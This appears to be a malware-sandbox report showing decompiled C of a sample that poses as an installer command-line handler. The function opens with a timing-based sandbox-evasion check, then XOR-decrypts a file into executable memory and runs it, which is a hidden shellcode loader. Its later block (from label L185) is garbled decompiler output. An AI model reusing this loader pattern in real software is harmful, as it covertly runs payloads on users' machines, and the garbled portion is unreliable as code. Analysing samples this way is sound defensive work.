106bd45 16517->16520 16521 106471d __woutput_s_l 9 API calls 16518->16521 16529 106bdf1 16519->16529 16532 10728a5 16520->16532 16521->16519 16524 1065573 __output_p_l 70 API calls 16525 106bd53 16524->16525 16536 1072726 16525->16536 16527 106bd59 16527->16519 16528 1064ed2 _free 70 API calls 16527->16528 16528->16519 16530 1062e99 _fseek 2 API calls 16529->16530 16531 106bdf7 16530->16531 16531->16506 16533 106bd4d 16532->16533 16534 10728b2 16532->16534 16533->16524 16534->16533 16535 1064ed2 _free 70 API calls 16534->16535 16535->16533 16537 1072732 __expandlocale 16536->16537 16538 1072752 16537->16538 16539 107273a 16537->16539 16561 1066594 InitOnceExecuteOnce 16538->16561 16540 1064798 __chsize_s 70 API calls 16539->16540 16542 107273f 16540->16542 16543 10647cc __woutput_s_l 70 API calls 16542->16543 16547 1072747 __expandlocale 16543->16547 16544 10727dc 16545 1064798 __chsize_s 70 API calls 16544->16545 16548 10727e1 16545->16548 16546 1072757 16546->16544 16546->16547 16549 1072789 16546->16549 16547->16527 16550 10647cc __woutput_s_l 70 API calls 16548->16550 16551 1070b73 ___lock_fhandle 72 API calls 16549->16551 16552 10727e9 16550->16552 16553 107278f 16551->16553 16554 106471d __woutput_s_l 9 API calls 16552->16554 16555 10727a2 16553->16555 16556 10727ad 16553->16556 16554->16547 16557 10727fd __wsopen_nolock 74 API calls 16555->16557 16558 10647cc __woutput_s_l 70 API calls 16556->16558 16559 10727a8 16557->16559 16558->16559 16562 10727d4 16559->16562 16561->16546 16565 107103e LeaveCriticalSection 16562->16565 16564 10727da 16564->16547 16565->16564 16566->16512

                        Executed Functions

                        Function 01061C90 Relevance: 79.6, APIs: 24, Strings: 21, Instructions: 864librarystringloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E01061C90(struct HINSTANCE__ __edx, struct HINSTANCE__* _a12) {
				struct HINSTANCE__* _v8;
				signed int _v12;
				WCHAR* _v16;
				void* _v20;
				struct HINSTANCE__* _v24;
				int _v28;
				void* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__ _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				struct HINSTANCE__* _v64;
				signed int _v68;
				int _v72;
				struct HINSTANCE__ _v76;
				struct HINSTANCE__* _v80;
				struct HINSTANCE__* _v84;
				struct HINSTANCE__* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				_Unknown_base(*)()* _v100;
				void* _v104;
				char _v120;
				intOrPtr _v1174338018;
				void* __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				_Unknown_base(*)()* _t305;
				void* _t306;
				void* _t307;
				void* _t313;
				struct HINSTANCE__* _t314;
				signed char _t337;
				signed char _t340;
				signed char _t341;
				signed char _t344;
				struct HINSTANCE__* _t356;
				struct HINSTANCE__* _t357;
				void* _t360;
				int _t361;
				struct HINSTANCE__* _t362;
				signed int _t363;
				signed int _t365;
				struct HINSTANCE__* _t367;
				signed int _t368;
				struct HINSTANCE__* _t370;
				signed int _t371;
				struct HINSTANCE__* _t373;
				signed int _t374;
				struct HINSTANCE__* _t376;
				signed int _t377;
				struct HINSTANCE__* _t379;
				signed int _t380;
				struct HINSTANCE__* _t382;
				WCHAR* _t386;
				signed int _t387;
				struct HINSTANCE__* _t389;
				signed int _t390;
				signed int _t392;
				struct HINSTANCE__* _t394;
				signed int _t395;
				struct HINSTANCE__* _t397;
				struct HINSTANCE__* _t404;
				struct HINSTANCE__* _t405;
				struct HINSTANCE__* _t406;
				struct HINSTANCE__* _t408;
				struct HINSTANCE__* _t409;
				struct HINSTANCE__* _t410;
				struct HINSTANCE__* _t411;
				struct HINSTANCE__* _t412;
				int _t419;
				struct HINSTANCE__* _t422;
				struct HINSTANCE__* _t425;
				struct HINSTANCE__* _t428;
				signed int _t430;
				struct HINSTANCE__* _t435;
				void* _t437;
				struct HINSTANCE__* _t439;
				void* _t441;
				struct HINSTANCE__* _t443;
				signed int _t447;
				struct HINSTANCE__* _t449;
				signed int _t451;
				void* _t458;
				long _t460;
				void* _t468;
				void* _t470;
				intOrPtr* _t472;
				struct HINSTANCE__* _t473;
				WCHAR* _t482;
				intOrPtr* _t490;
				struct HINSTANCE__* _t491;
				void* _t492;
				signed char _t493;
				signed char _t496;
				struct HINSTANCE__* _t504;
				signed short _t505;
				struct HINSTANCE__ _t514;
				void* _t515;
				struct HINSTANCE__* _t518;
				void* _t520;
				_Unknown_base(*)()* _t521;
				struct HINSTANCE__* _t522;
				void* _t523;
				signed int _t534;
				void* _t535;
				signed int _t536;
				signed int _t537;
				long _t540;
				void* _t541;
				int _t544;
				signed int _t562;
				void* _t565;
				signed int _t566;
				void* _t567;
				void* _t580;
				int _t581;
				int _t583;

				_t514 = __edx;
				_t581 = _t580 - 0x74;
				_v24 = 0;
				_v60 = 0;
				_v64 = 0;
				_v36 = 0;
				_v48 = 0;
				_v80 = 0;
				_v84 = 0;
				_v88 = 0;
				_v92 = 0;
				_v96 = 0;
				_v52 = 0;
				_v16 = 0;
				_v20 = 0;
				_v28 = 0;
				_v104 = 0;
				_v68 = 0;
				_v12 = 0;
				_v32 = 0;
				_v76 = 0;
				_v72 = 0;
				_v44 = 5;
				_v40 = 0;
				_v8 = 0;
				_v56 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "GetTickCount");
				_t521 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "Sleep");
				_t305 = GetProcAddress(LoadLibraryW(L"Kernel32.dll"), "VirtualAlloc");
				_t472 = _v56;
				_v100 = _t305;
				_t306 =  *_t472(_t520, _t541, _t470, _t567);
				Sleep(0x2be); // executed
				_t307 =  *_t472();
				_t595 = _t307 - _t306 - 0x2bc;
				if(_t307 - _t306 >= 0x2bc) {
					_t458 = E01063B3A(_a12, L"rb"); // executed
					_push(2);
					_t565 = _t458;
					_push(0);
					_push(_t565); // executed
					E010633B4(_t472, _t514, _t521, _t565, _t595); // executed
					_push(_t565); // executed
					_t460 = E0106378C(_t472, _t514, _t521, _t565, _t595); // executed
					_push(0);
					_push(0);
					_push(_t565);
					_t540 = _t460; // executed
					E010633B4(_t472, _t514, _t540, _t565, _t595); // executed
					_t490 = VirtualAlloc(0, _t540, 0x3000, 0x40);
					E01063279(_t490, _t540, 1, _t565); // executed
					_t581 = _t581 + 0x34;
					_t566 = 0;
					if(_t540 != 0) {
						do {
							_t514 = 0xaaaaaaab * _t566 >> 0x20 >> 3;
							_t468 = _t566 - (_t514 + _t514 * 2 << 2);
							_t566 = _t566 + 1;
							_t35 = _t468 + "248058040134"; // 0x30383432
							 *(_t490 + _t566 - 1) =  *(_t490 + _t566 - 1) ^  *_t35;
							_t597 = _t566 - _t540;
						} while (_t566 < _t540);
					}
					 *_t490(); // executed
				}
				__imp__#17();
				E01061A90(_t597, GetCommandLineW(),  &_a12,  &_v8);
				_t522 = _a12;
				_t473 = _v8;
				if(_t522 <= 1) {
					L11:
					__eflags = _t522 - 3;
					if(_t522 != 3) {
						L16:
						_t544 = 1;
						_v56 = 1;
						__eflags = _t522 - 1;
						if(_t522 > 1) {
							do {
								_t499 = _t473[_t544];
								_t365 =  *(_t473[_t544]) & 0x0000ffff;
								__eflags = _t365 - 0x2f;
								if(_t365 == 0x2f) {
									L19:
									_t367 = E01061960(_t499 + 2, "regserver");
									__eflags = _t367;
									if(_t367 == 0) {
										goto L21;
									} else {
										_v88 = 1;
									}
								} else {
									__eflags = _t365 - 0x2d;
									if(_t365 != 0x2d) {
										L21:
										_t500 = _t473[_t544];
										_t368 =  *(_t473[_t544]) & 0x0000ffff;
										__eflags = _t368 - 0x2f;
										if(_t368 == 0x2f) {
											L23:
											_t370 = E01061960(_t500 + 2, "unregserver");
											__eflags = _t370;
											if(_t370 != 0) {
												goto L152;
											} else {
												goto L24;
											}
										} else {
											__eflags = _t368 - 0x2d;
											if(_t368 != 0x2d) {
												L24:
												_t501 = _t473[_t544];
												_t371 =  *(_t473[_t544]) & 0x0000ffff;
												__eflags = _t371 - 0x2f;
												if(_t371 == 0x2f) {
													L26:
													_t373 = E01061960(_t501 + 2, "unregister");
													__eflags = _t373;
													if(_t373 != 0) {
														goto L152;
													} else {
														goto L27;
													}
												} else {
													__eflags = _t371 - 0x2d;
													if(_t371 != 0x2d) {
														L27:
														_t502 = _t473[_t544];
														_t374 =  *(_t473[_t544]) & 0x0000ffff;
														__eflags = _t374 - 0x2f;
														if(_t374 == 0x2f) {
															L29:
															_t376 = E01061960(_t502 + 2, "unreg");
															__eflags = _t376;
															if(_t376 != 0) {
																L152:
																_v92 = 1;
															} else {
																goto L30;
															}
														} else {
															__eflags = _t374 - 0x2d;
															if(_t374 != 0x2d) {
																L30:
																_t491 = _t473[_t544];
																_t377 = _t491->i & 0x0000ffff;
																__eflags = _t377 - 0x2f;
																if(_t377 == 0x2f) {
																	L32:
																	_t379 = E010619F0( &(_t491->i), "i");
																	__eflags = _t379;
																	if(_t379 != 0) {
																		goto L144;
																	} else {
																		goto L33;
																	}
																} else {
																	__eflags = _t377 - 0x2d;
																	if(_t377 != 0x2d) {
																		L33:
																		_t491 = _t473[_t544];
																		_t387 = _t491->i & 0x0000ffff;
																		__eflags = _t387 - 0x2f;
																		if(_t387 == 0x2f) {
																			L35:
																			_t389 = E010619F0( &(_t491->i), "package");
																			__eflags = _t389;
																			if(_t389 != 0) {
																				L144:
																				_t473 = _t473[_t544];
																				_t380 = _t473->i & 0x0000ffff;
																				__eflags = _t380 - 0x2f;
																				if(_t380 == 0x2f) {
																					L147:
																					_t382 = E010619F0( &(_t473->i), "i");
																				} else {
																					__eflags = _t380 - 0x2d;
																					if(_t380 == 0x2d) {
																						goto L147;
																					} else {
																						_t382 = 0;
																					}
																				}
																				__eflags = _t382;
																				_t534 =  !=  ? 2 : 8;
																				_v24 = 1;
																				_t314 = lstrlenW(_v8[_t544]);
																				__eflags = _t314 - 8;
																				if(_t314 <= 8) {
																					_t522 = _a12;
																					_t544 = _t544 + 1;
																					__eflags = _t544 - _t522;
																					if(_t544 >= _t522) {
																						goto L185;
																					}
																					_t473 = _v8;
																					_v16 = _t473[_t544];
																				} else {
																					_t386 = _t473 + _t534 * 2;
																					_t522 = _a12;
																					_t473 = _v8;
																					_v16 = _t386;
																				}
																			} else {
																				goto L36;
																			}
																		} else {
																			__eflags = _t387 - 0x2d;
																			if(_t387 != 0x2d) {
																				L36:
																				_t491 = _t473[_t544];
																				_t390 = _t491->i & 0x0000ffff;
																				__eflags = _t390 - 0x2f;
																				if(_t390 == 0x2f) {
																					L38:
																					_t314 = E01061960( &(_t491->i), "a");
																					__eflags = _t314;
																					if(_t314 == 0) {
																						goto L41;
																					} else {
																						_t544 = _t544 + 1;
																						_v24 = 1;
																						_v60 = 1;
																						_v72 = 1;
																						__eflags = _t544 - _t522;
																						if(_t544 >= _t522) {
																							goto L185;
																						}
																						_v16 = _t473[_t544];
																						E01061430( &_v20, L"ACTION=ADMIN");
																						_t473 = _v8;
																					}
																				} else {
																					__eflags = _t390 - 0x2d;
																					if(_t390 != 0x2d) {
																						L41:
																						_t491 = _t473[_t544];
																						_t392 = _t491->i & 0x0000ffff;
																						__eflags = _t392 - 0x2f;
																						if(_t392 == 0x2f) {
																							L43:
																							_t394 = E010619F0( &(_t491->i), "f");
																							__eflags = _t394;
																							if(_t394 == 0) {
																								goto L51;
																							} else {
																								_t314 = lstrlenW(_t473[_t544]);
																								_t473 = _t314;
																								_t537 = 2;
																								_v64 = 1;
																								__eflags = _t473 - 2;
																								if(_t473 > 2) {
																									do {
																										_t491 =  *(_v8[_t544] + _t537 * 2) & 0x0000ffff;
																										_t441 = _t491 - 0x41;
																										__eflags = _t441 - 0x35;
																										if(_t441 > 0x35) {
																											L48:
																											_push(_t491);
																											_push("Unknown option \"%c\" in Repair mode\n");
																											_t443 = E01062E24() + 0x40;
																											__eflags = _t443;
																											_push(_t443);
																											_t314 = E01062F67(_t473, _t537, _t544, _t443);
																											_t581 = _t581 + 0xc;
																										} else {
																											switch( *((intOrPtr*)(( *(_t441 + 0x1062780) & 0x000000ff) * 4 +  &M01062778))) {
																												case 0:
																													goto L49;
																												case 1:
																													goto L48;
																											}
																										}
																										L49:
																										_t537 = _t537 + 1;
																										__eflags = _t537 - _t473;
																									} while (_t537 < _t473);
																								}
																								goto L64;
																							}
																						} else {
																							__eflags = _t392 - 0x2d;
																							if(_t392 != 0x2d) {
																								L51:
																								_t491 = _t473[_t544];
																								_t395 = _t491->i & 0x0000ffff;
																								__eflags = _t395 - 0x2f;
																								if(_t395 == 0x2f) {
																									L53:
																									_t397 = E010619F0( &(_t491->i), "x");
																									__eflags = _t397;
																									if(_t397 != 0) {
																										goto L134;
																									} else {
																										goto L54;
																									}
																								} else {
																									__eflags = _t395 - 0x2d;
																									if(_t395 != 0x2d) {
																										L54:
																										_push("uninstall");
																										_t404 = L01061900(_t473[_t544]);
																										__eflags = _t404;
																										if(_t404 != 0) {
																											L134:
																											_t491 = _t473[_t544];
																											_v24 = 1;
																											_t314 = _t491->i & 0x0000ffff;
																											__eflags = _t314 - 0x2f;
																											if(_t314 == 0x2f) {
																												L136:
																												_t314 = E010619F0( &(_t491->i), "x");
																												__eflags = _t314;
																												if(_t314 == 0) {
																													goto L138;
																												} else {
																													_t473 = _t473[_t544] + 4;
																													_v16 = _t473;
																												}
																											} else {
																												__eflags = _t314 - 0x2d;
																												if(_t314 != 0x2d) {
																													L138:
																													_t473 = _v16;
																												} else {
																													goto L136;
																												}
																											}
																											__eflags = _t473;
																											if(_t473 == 0) {
																												L141:
																												_t544 = _t544 + 1;
																												__eflags = _t544 - _t522;
																												if(_t544 >= _t522) {
																													goto L185;
																												}
																												_t473 = _v8;
																												_v16 = _t473[_t544];
																												E01061430( &_v20, L"REMOVE=ALL");
																											} else {
																												__eflags = _t473->i;
																												if(_t473->i != 0) {
																													_t473 = _v8;
																													E01061430( &_v20, L"REMOVE=ALL");
																												} else {
																													goto L141;
																												}
																											}
																										} else {
																											_push("j");
																											_t405 = E01061930(_t473[_t544]);
																											__eflags = _t405;
																											if(_t405 == 0) {
																												_t314 = E01061960(_t473[_t544], "u");
																												__eflags = _t314;
																												if(_t314 == 0) {
																													_t314 = E01061960(_t473[_t544], "m");
																													__eflags = _t314;
																													if(_t314 == 0) {
																														_push("t");
																														_t314 = L01061900(_t473[_t544]);
																														__eflags = _t314;
																														if(_t314 == 0) {
																															_push("g");
																															_t314 = L01061900(_t473[_t544]);
																															__eflags = _t314;
																															if(_t314 == 0) {
																																_push("l");
																																_t406 = E01061930(_t473[_t544]);
																																__eflags = _t406;
																																if(_t406 == 0) {
																																	_push("p");
																																	_t314 = L01061900(_t473[_t544]);
																																	__eflags = _t314;
																																	if(_t314 != 0) {
																																		L132:
																																		_t544 = _t544 + 1;
																																		_v48 = 1;
																																		__eflags = _t544 - _t522;
																																		if(_t544 >= _t522) {
																																			goto L185;
																																		}
																																		_v76 = _t473[_t544];
																																	} else {
																																		_push("update");
																																		_t314 = L01061900(_t473[_t544]);
																																		__eflags = _t314;
																																		if(_t314 != 0) {
																																			goto L132;
																																		} else {
																																			_push("q");
																																			_t408 = E01061930(_t473[_t544]);
																																			__eflags = _t408;
																																			if(_t408 == 0) {
																																				_push("passive");
																																				_t409 = L01061900(_t473[_t544]);
																																				__eflags = _t409;
																																				if(_t409 == 0) {
																																					_push("y");
																																					_t314 = L01061900(_t473[_t544]);
																																					__eflags = _t314;
																																					if(_t314 == 0) {
																																						_push("z");
																																						_t314 = L01061900(_t473[_t544]);
																																						__eflags = _t314;
																																						if(_t314 == 0) {
																																							_push("help");
																																							_t314 = L01061900(_t473[_t544]);
																																							__eflags = _t314;
																																							if(_t314 != 0) {
																																								L184:
																																								E01061320(0);
																																								goto L185;
																																							}
																																							_push("?");
																																							_t314 = L01061900(_t473[_t544]);
																																							__eflags = _t314;
																																							if(_t314 != 0) {
																																								goto L184;
																																							}
																																							_push("m");
																																							_t410 = L01061900(_t473[_t544]);
																																							__eflags = _t410;
																																							if(_t410 == 0) {
																																								_push("D");
																																								_t411 = L01061900(_t473[_t544]);
																																								__eflags = _t411;
																																								if(_t411 == 0) {
																																									_push("V");
																																									_t412 = L01061900(_t473[_t544]);
																																									__eflags = _t412;
																																									if(_t412 == 0) {
																																										E01061430( &_v20, _t473[_t544]);
																																									} else {
																																										_v96 = 1;
																																									}
																																								} else {
																																									_v52 = 1;
																																								}
																																							} else {
																																								_v52 = 1;
																																							}
																																						} else {
																																							_t544 = _t544 + 1;
																																							_v84 = 1;
																																							__eflags = _t544 - _t522;
																																							if(_t544 >= _t522) {
																																								goto L185;
																																							}
																																							_v40 = _t473[_t544];
																																						}
																																					} else {
																																						_t544 = _t544 + 1;
																																						_v80 = 1;
																																						__eflags = _t544 - _t522;
																																						if(_t544 >= _t522) {
																																							goto L185;
																																						}
																																						_v40 = _t473[_t544];
																																					}
																																				} else {
																																					E01061430( &_v20, L"REBOOTPROMPT=\"S\"");
																																				}
																																			} else {
																																				_t419 = lstrlenW(_t473[_t544]);
																																				__eflags = _t419 - 2;
																																				if(_t419 == 2) {
																																					L114:
																																					_v44 = 2;
																																				} else {
																																					_t422 = E01061960(_t473[_t544] + 4, "n");
																																					__eflags = _t422;
																																					if(_t422 != 0) {
																																						goto L114;
																																					} else {
																																						_t425 = E01061960(_t473[_t544] + 4, "uiet");
																																						__eflags = _t425;
																																						if(_t425 != 0) {
																																							goto L114;
																																						} else {
																																							_t428 = E01061960(_t473[_t544] + 4, "r");
																																							__eflags = _t428;
																																							if(_t428 != 0) {
																																								_v44 = 4;
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																} else {
																																	_t314 = lstrlenW(_t473[_t544]);
																																	__eflags = _t314 - 2;
																																	if(_t314 > 2) {
																																		_t562 = _v12;
																																		_t535 = _v32;
																																		_t504 = _t473[_t544] + 4;
																																		__eflags = _t504;
																																		_t160 = _t314 - 2; // -2
																																		_t518 = _t160;
																																		do {
																																			_t314 = ( *_t504 & 0x0000ffff) + 0xffffffdf;
																																			__eflags = _t314 - 0x56;
																																			if(_t314 <= 0x56) {
																																				_t161 = _t314 + 0x106282c; // 0xffffd8af
																																				_t314 =  *_t161 & 0x000000ff;
																																				switch( *((intOrPtr*)(_t314 * 4 +  &M010627F0))) {
																																					case 0:
																																						__edi = __edi | 0x00000002;
																																						__eflags = __edi;
																																						goto L101;
																																					case 1:
																																						__esi = 0x7fdf;
																																						goto L101;
																																					case 2:
																																						__edi = __edi | 0x00000001;
																																						goto L101;
																																					case 3:
																																						__esi = __esi | 0x00000100;
																																						goto L101;
																																					case 4:
																																						__esi = __esi | 0x00000800;
																																						goto L101;
																																					case 5:
																																						__esi = __esi | 0x00000002;
																																						goto L101;
																																					case 6:
																																						_t562 = _t562 | 0x00000010;
																																						goto L101;
																																					case 7:
																																						__esi = __esi | 0x00000001;
																																						goto L101;
																																					case 8:
																																						__esi = __esi | 0x00000080;
																																						goto L101;
																																					case 9:
																																						__esi = __esi | 0x00000400;
																																						goto L101;
																																					case 0xa:
																																						__esi = __esi | 0x00000200;
																																						goto L101;
																																					case 0xb:
																																						__esi = __esi | 0x00000008;
																																						goto L101;
																																					case 0xc:
																																						__esi = __esi | 0x00001000;
																																						goto L101;
																																					case 0xd:
																																						__esi = __esi | 0x00000004;
																																						goto L101;
																																					case 0xe:
																																						goto L101;
																																				}
																																			}
																																			L101:
																																			_t504 =  &(_t504->i);
																																			_t518 = _t518 - 1;
																																			__eflags = _t518;
																																		} while (_t518 != 0);
																																		_v32 = _t535;
																																		_t522 = _a12;
																																		_v12 = _t562;
																																		_t544 = _v56;
																																	}
																																	_t544 = _t544 + 1;
																																	__eflags = _t544 - _t522;
																																	if(_t544 >= _t522) {
																																		goto L185;
																																	}
																																	0x1060000(_v12, _t473[_t544], _v32);
																																	__eflags = _t314;
																																	if(_t314 != 0) {
																																		ExitProcess(1);
																																	}
																																}
																															} else {
																																_t544 = _t544 + 1;
																																__eflags = _t544 - _t522;
																																if(_t544 >= _t522) {
																																	goto L185;
																																}
																																_t514 = _t473[_t544];
																																_t505 = 0;
																																_t430 =  *_t514 & 0x0000ffff;
																																__eflags = _t430 - 0x30;
																																if(_t430 >= 0x30) {
																																	while(1) {
																																		__eflags = _t430 - 0x39;
																																		if(_t430 > 0x39) {
																																			goto L81;
																																		}
																																		_t514 = _t514 + 2;
																																		_t505 = (_t430 & 0x0000ffff) + (_t505 + _t505 * 4 - 0x18) * 2;
																																		_t430 =  *_t514 & 0x0000ffff;
																																		__eflags = _t430 - 0x30;
																																		if(_t430 >= 0x30) {
																																			continue;
																																		}
																																		goto L81;
																																	}
																																}
																																L81:
																																_v68 = _t505 & 0x0000ffff;
																															}
																														} else {
																															_t544 = _t544 + 1;
																															__eflags = _t544 - _t522;
																															if(_t544 >= _t522) {
																																goto L185;
																															}
																															E01061430( &_v104, _t473[_t544]);
																														}
																													} else {
																														_v28 = 0;
																														goto L70;
																													}
																												} else {
																													_v28 = 1;
																													L70:
																													_t544 = _t544 + 1;
																													_v36 = 1;
																													__eflags = _t544 - _t522;
																													if(_t544 >= _t522) {
																														goto L185;
																													}
																													_v16 = _t473[_t544];
																													_t473 = _v8;
																												}
																											} else {
																												_t314 = lstrlenW(_t473[_t544]);
																												_t473 = _t314;
																												_t536 = 2;
																												_v36 = 1;
																												__eflags = _t473 - 2;
																												if(_t473 > 2) {
																													do {
																														_t491 = _v8[_t544][_t536] & 0x0000ffff;
																														_t437 = _t491 - 0x4d;
																														__eflags = _t437 - 0x28;
																														if(_t437 > 0x28) {
																															L62:
																															_push(_t491);
																															_push("Unknown option \"%c\" in Advertise mode\n");
																															_t439 = E01062E24() + 0x40;
																															__eflags = _t439;
																															_push(_t439);
																															_t314 = E01062F67(_t473, _t536, _t544, _t439);
																															_t581 = _t581 + 0xc;
																														} else {
																															_t314 =  *(_t437 + 0x10627c4) & 0x000000ff;
																															switch( *((intOrPtr*)(_t314 * 4 +  &M010627B8))) {
																																case 0:
																																	_v28 = 0;
																																	goto L63;
																																case 1:
																																	_v28 = 1;
																																	goto L63;
																																case 2:
																																	goto L62;
																															}
																														}
																														L63:
																														_t536 = _t536 + 1;
																														__eflags = _t536 - _t473;
																													} while (_t536 < _t473);
																												}
																												L64:
																												_t522 = _a12;
																												_t544 = _t544 + 1;
																												__eflags = _t544 - _t522;
																												if(_t544 >= _t522) {
																													L185:
																													E01061320(1);
																													_t583 = _t314->i;
																													_t314->i = _t581;
																													 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)(_t314 + 0x20)) + _t544;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t491->i = _t314 + _t491->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t491->i = _t314 + _t491->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													_t491->i = _t314 + _t491->i;
																													_t314->i = _t314 + _t314->i;
																													_t314->i = _t314 + _t314->i;
																													 *((intOrPtr*)(_t473 + 0x62129ff)) =  *((intOrPtr*)(_t473 + 0x62129ff)) + _t491;
																													_t314->i = _t314->i + _t583;
																													 *_t544 =  *_t544 & _t314;
																													 *_t514 =  *_t514 + _t544;
																													 *_t544 =  *_t544 & _t314;
																													_t314->i = _t314 + _t314->i;
																													asm("fisub word [edx]");
																													_t515 = _t514 + _t514;
																													_t492 = _t491 + _t473;
																													_t337 = _t314 +  *_t514 +  *_t514 +  *_t514 + _t491->i +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *((intOrPtr*)(_t314 +  *_t514 +  *_t514 +  *_t514 + _t491->i +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514 +  *_t514)) +  *_t514 +  *_t514 +  *_t514 + _t491->i &  *_t544 &  *_t544;
																													 *((intOrPtr*)(_t337 - 0x52fef9de)) =  *((intOrPtr*)(_t337 - 0x52fef9de)) + _t473;
																													 *((intOrPtr*)(_t473 - 0x76fef9de)) =  *((intOrPtr*)(_t473 - 0x76fef9de)) + _t515;
																													_v1174338018 = _v1174338018 + _t544;
																													_t340 = _t337 &  *_t544 &  *_t544 &  *_t544;
																													_t341 = _t340 &  *_t544;
																													 *((intOrPtr*)(_t341 - 0x57fef9de)) =  *((intOrPtr*)(_t341 - 0x57fef9de)) + _t583;
																													 *((intOrPtr*)(_t544 - 0x1efef9de)) =  *((intOrPtr*)(_t544 - 0x1efef9de)) + _t492;
																													_t344 = _t341 &  *_t544 &  *_t544 &  *_t544;
																													 *_t344 =  *_t344 + _t344;
																													 *((intOrPtr*)(_t515 + _t340 + _t492)) =  *((intOrPtr*)(_t515 + _t340 + _t492)) + _t344;
																													_t493 = _t492 +  *_t544;
																													es = cs;
																													 *_t493 =  *_t493 | _t493;
																													_t496 = (_t493 |  *_t544 |  *((_t493 |  *_t544) + 0xe0e0e0e)) +  *_t544;
																													es = cs;
																													 *_t496 =  *_t496 | _t496;
																													__eflags = _t496 |  *_t544 |  *((_t496 |  *_t544) + 0x2425ffcc);
																													asm("int3");
																													return __imp__#17(cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, cs, es, es, es);
																												}
																												_t435 = _v8;
																												_v16 = _t435[_t544];
																												_t473 = _t435;
																											}
																										}
																									} else {
																										goto L53;
																									}
																								}
																							} else {
																								goto L43;
																							}
																						}
																					} else {
																						goto L38;
																					}
																				}
																			} else {
																				goto L35;
																			}
																		}
																	} else {
																		goto L32;
																	}
																}
															} else {
																goto L29;
															}
														}
													} else {
														goto L26;
													}
												}
											} else {
												goto L23;
											}
										}
									} else {
										goto L19;
									}
								}
								_t544 = _t544 + 1;
								_v56 = _t544;
								__eflags = _t544 - _t522;
							} while (_t544 < _t522);
						}
						0x1060000(_v44, 0);
						_t473 = _v20;
						_t313 = E01061490(_t473);
						__eflags = _v60;
						_t491 = _v48;
						_t523 = _t313;
						_t314 = _v24;
						if(_v60 != 0) {
							_t514 = 0;
							__eflags = _t491;
							_t314 =  !=  ? 0 : _t314;
						}
						_t544 = 1;
						__eflags = _t314;
						if(_t314 == 0) {
							__eflags = _v64;
							if(_v64 != 0) {
								goto L160;
							} else {
								__eflags = _v36;
								if(_v36 == 0) {
									__eflags = _t491;
									if(_t491 == 0) {
										__eflags = _v80;
										if(_v80 == 0) {
											__eflags = _v84;
											if(_v84 == 0) {
												__eflags = _v88;
												if(_v88 == 0) {
													__eflags = _v92;
													if(_v92 == 0) {
														__eflags = _v96;
														if(_v96 == 0) {
															__eflags = _v52;
															if(_v52 == 0) {
																goto L185;
															}
															goto L160;
														} else {
															0x1060000();
															return _t314;
														}
													} else {
														return E010611A0(_t523);
													}
												} else {
													return E010610B0();
												}
											} else {
												return E01061060(_t491, _v40);
											}
										} else {
											_a12 = 0;
											_t356 =  *((intOrPtr*)(E010612A0(_v40, "DllRegisterServer",  &_a12)))();
											__eflags = _t356;
											if(_t356 < 0) {
												goto L160;
											} else {
												_t357 = _a12;
												__eflags = _t357;
												if(_t357 != 0) {
													FreeLibrary(_t357);
												}
												__eflags = 0;
												return 0;
											}
										}
									} else {
										0x1060000(_v76, _v16, _v72, _t523);
										return _t314;
									}
								} else {
									_t360 = E010615A0(_t491, _t473);
									0x1060000(_v16, _v28, _t360, _v68);
									return _t360;
								}
							}
						} else {
							_t482 = _v16;
							_t361 = lstrlenW(_t482);
							__eflags = _t361 - 0x26;
							if(_t361 != 0x26) {
								L161:
								0x1060000(_t482, _t523);
								_t544 = _t361;
								__eflags = _t544 - 2;
								if(_t544 != 2) {
									goto L160;
								} else {
									_t362 = E01061860(_t482);
									__eflags = _t362;
									if(_t362 == 0) {
										goto L160;
									} else {
										0x1060000(_t362, _t523);
										return _t362;
									}
								}
							} else {
								_t363 =  &_v120;
								__imp__CLSIDFromString(_t482, _t363);
								asm("sbb eax, eax");
								_t361 =  ~_t363 + 1;
								__eflags = _t361;
								if(_t361 == 0) {
									goto L161;
								} else {
									0x1060000(_t482, 0, 5, _t523);
									_t544 = _t361;
									L160:
									return _t544;
								}
							}
						}
					} else {
						_t510 =  *(_t473 + 4);
						_t447 =  *( *(_t473 + 4)) & 0x0000ffff;
						__eflags = _t447 - 0x2f;
						if(_t447 == 0x2f) {
							L14:
							_t449 = E01061960( &(_t510[1]), "Embedding");
							__eflags = _t449;
							if(_t449 == 0) {
								goto L16;
							} else {
								return E01061700( *((intOrPtr*)(_t473 + 8)));
							}
						} else {
							__eflags = _t447 - 0x2d;
							if(_t447 != 0x2d) {
								goto L16;
							} else {
								goto L14;
							}
						}
					}
				} else {
